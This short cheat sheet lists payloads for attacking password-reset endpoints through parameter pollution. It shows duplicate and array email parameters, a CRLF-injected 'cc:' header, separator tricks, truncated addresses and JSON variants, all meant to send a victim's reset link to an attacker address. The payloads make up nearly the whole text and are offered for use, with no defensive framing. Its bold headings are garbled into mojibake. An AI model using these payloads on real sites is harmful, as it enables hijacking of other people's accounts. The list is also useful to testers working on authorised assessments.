---> Parameter pollution on password reset

GET /passwordreset

ğ——ğ—¼ğ˜‚ğ—¯ğ—¹ğ—² ğ—½ğ—®ğ—¿ğ—®ğ—ºğ—²ğ˜ğ—²ğ—¿ (ğ—®ğ—¸ğ—®. ğ—›ğ—£ğ—£ / ğ—›ğ—§ğ—§ğ—£ ğ—½ğ—®ğ—¿ğ—®ğ—ºğ—²ğ˜ğ—²ğ—¿ ğ—½ğ—¼ğ—¹ğ—¹ğ˜‚ğ˜ğ—¶ğ—¼ğ—»):
email=victim@xyz.tld&email=hacker@xyz.tld
email[]=victim@xyz.tld&email[]=hacker@xyz.tld

ğ—–ğ—®ğ—¿ğ—¯ğ—¼ğ—» ğ—°ğ—¼ğ—½ğ˜†:
email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld

ğ—¨ğ˜€ğ—¶ğ—»ğ—´ ğ˜€ğ—²ğ—½ğ—®ğ—¿ğ—®ğ˜ğ—¼ğ—¿ğ˜€: 
email=victim@xyz.tld,hacker@xyz.tld
email=victim@xyz.tld%20hacker@xyz.tld
email=victim@xyz.tld|hacker@xyz.tld

ğ—¡ğ—¼ ğ—±ğ—¼ğ—ºğ—®ğ—¶ğ—»:
email=victim

ğ—¡ğ—¼ ğ—§ğ—Ÿğ—— (ğ—§ğ—¼ğ—½ ğ—Ÿğ—²ğ˜ƒğ—²ğ—¹ ğ——ğ—¼ğ—ºğ—®ğ—¶ğ—»):
email=victim@xyz

ğ—ğ—¦ğ—¢ğ—¡ ğ˜ğ—®ğ—¯ğ—¹ğ—²:
{"email":["victim@xyz.tld","hacker@xyz.tld"]}
{"email":"v@g.com","email":"a@g.com"}